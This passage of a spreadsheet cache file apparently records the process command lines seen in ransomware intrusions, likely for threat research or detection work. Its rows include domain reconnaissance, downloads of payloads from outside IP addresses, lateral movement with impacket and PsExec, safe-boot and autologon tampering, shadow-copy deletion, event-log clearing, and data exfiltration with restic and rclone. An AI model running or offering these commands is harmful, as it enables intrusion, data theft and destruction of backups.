    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0009"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0010"/>
    <m/>
    <m/>
    <s v="net localgroup administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0011"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0012"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net group &quot;Domain controllers&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0013"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net group &quot;domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0014"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0015"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net group /Domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0016"/>
    <m/>
    <m/>
    <s v="cmd.exe /C net group &quot;Domain Computers&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0017"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://localhost:33121/'); Invoke-FindLocalAdminAccess -Thread 50"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0018"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0019"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0020"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd c:\windows\adfs\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 "/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0021"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd mkdir py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0022"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd  py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0023"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0024"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="&quot;cmd.exe /Q /c curl -k https://91.92.245.26/python.zip -o c:\windows\adfs\py\python.zip 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0025"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="curl -k https://91.92.245.26/python.zip "/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0026"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v=" cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0027"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0028"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="pythonw.exe wo12.py"/>
    <s v="cmd.exe /Q /c pythonw.exe wo12.py 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0029"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip -DestinationPath c:\windows\adfs\py\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0030"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip  -DestinationPath c:\windows\adfs\py\"/>
    <s v=" cmd.exe /Q /c powershell -w -hidden -command Expand-Archive c:\windows\adfs\py\python.zip -DestinationPath c:\windows\adfs\py\ 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0031"/>
    <m/>
    <m/>
    <s v="cmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0032"/>
    <m/>
    <m/>
    <s v="bcdedit  /set {default} safeboot network"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0033"/>
    <m/>
    <m/>
    <s v="findstr  /C:&quot;The operation completed successfully.&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0034"/>
    <m/>
    <m/>
    <s v="reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d &quot;cmd.exe /c C:\&lt;REDACTED-COMPANY-NAME&gt;.exe&quot; /f _x000a_findstr  /C:&quot;The operation completed successfully.&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0035"/>
    <m/>
    <m/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultUserName /t REG_SZ /d &lt;REDACTED-DOMAIN-NAME&gt;\backup2 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0036"/>
    <m/>
    <m/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultPassword /t REG_SZ /d JapanNight!128 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0037"/>
    <m/>
    <m/>
    <s v="reg  add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoAdminLogon /t REG_SZ /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0038"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0039"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /d Service&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0040"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;bcdedit /set {current} safeboot network&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0041"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network &quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0042"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \&quot;C:\example.exe\&quot;&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0043"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network &quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0044"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \&quot;C:\example.exe\&quot;&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0045"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network &quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0046"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \&quot;C:\example.exe\&quot;&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0047"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\15991160457623399845550968347370640942 /f&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0048"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /f&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0049"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;sc delete 15991160457623399845550968347370640942&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0050"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;bcdedit /deletevalue {current} safeboot&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0051"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wmic csproduct get UUID&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0052"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;iisreset.exe /stop&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0053"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0054"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;vssadmin.exe Delete Shadows /all /quiet&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0055"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;arp -a&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0056"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\cmd.exe &quot;cmd&quot; /c &quot;wmic.exe Shadowcopy Delete&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0057"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wevtutil.exe el&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0058"/>
    <m/>
    <m/>
    <s v="C:\Windows\SysWOW64\cmd.exe &quot;cmd&quot; /c &quot;wevtutil.exe cl &lt;MULTIPLE EVENT LOGS&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0059"/>
    <m/>
    <m/>
    <s v="restic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0060"/>
    <m/>
    <m/>
    <s v="restic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup &quot;F:\Shares\&lt;REDACTED&gt;\&lt;REDACTED&gt;&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0061"/>
    <m/>
    <m/>
    <s v="cmd.exe /C PsExec64.exe -accepteula \\&lt;DOMAIN-CONTROLLER-IP&gt; -c -f -d -s up.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0062"/>
    <m/>
    <m/>
    <s v="net  user REDACTED JapanNight!128 /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0063"/>
    <m/>
    <m/>
    <s v="cmd.exe /C for /f %a in (pc.txt) do copy /y \\&lt;REDACTED&gt;\c$\&lt;REDACTED&gt;.exe \\%a\c$\&lt;REDACTED&gt;.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0064"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe "/>
    <s v="pythonw.exe wo12.py"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="procc-eid0065"/>
    <m/>
    <m/>
    <s v="bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0066"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0067"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscs.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0068"/>
    <m/>
    <m/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/csss.exe C:\programdata\cscs.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0069"/>
    <m/>
    <m/>
    <s v="powershell Invoke-WebRequest &quot;http://temp.sh/VSlAV/http64.exe&quot; -OutFile C:\programdata\rr.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0070"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0071"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0072"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd c/programdata 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0073"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0074"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd goat.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0075"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c quser 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0076"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c cd dir1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0077"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c db.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0078"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c del db.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0079"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c del sp.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0080"/>
    <m/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /Q /c sp.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0081"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0082"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0083"/>
    <m/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0084"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0085"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0086"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0087"/>
    <m/>
    <m/>
    <s v="net view /all"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0088"/>
    <m/>
    <m/>
    <s v="ipconfig  /all"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0089"/>
    <m/>
    <m/>
    <s v="net  group &quot;domain computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0090"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <s v="cmd /c rundll32.exe c:\Users\&lt;&gt;\AppData\Roaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0091"/>
    <m/>
    <m/>
    <s v="rclone config"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0092"/>
    <m/>
    <m/>
    <s v="rclone copy &lt;path&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="procc-eid0093"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\msiexec.exe /I C:\Windows\TEMP\setup.msi"/>
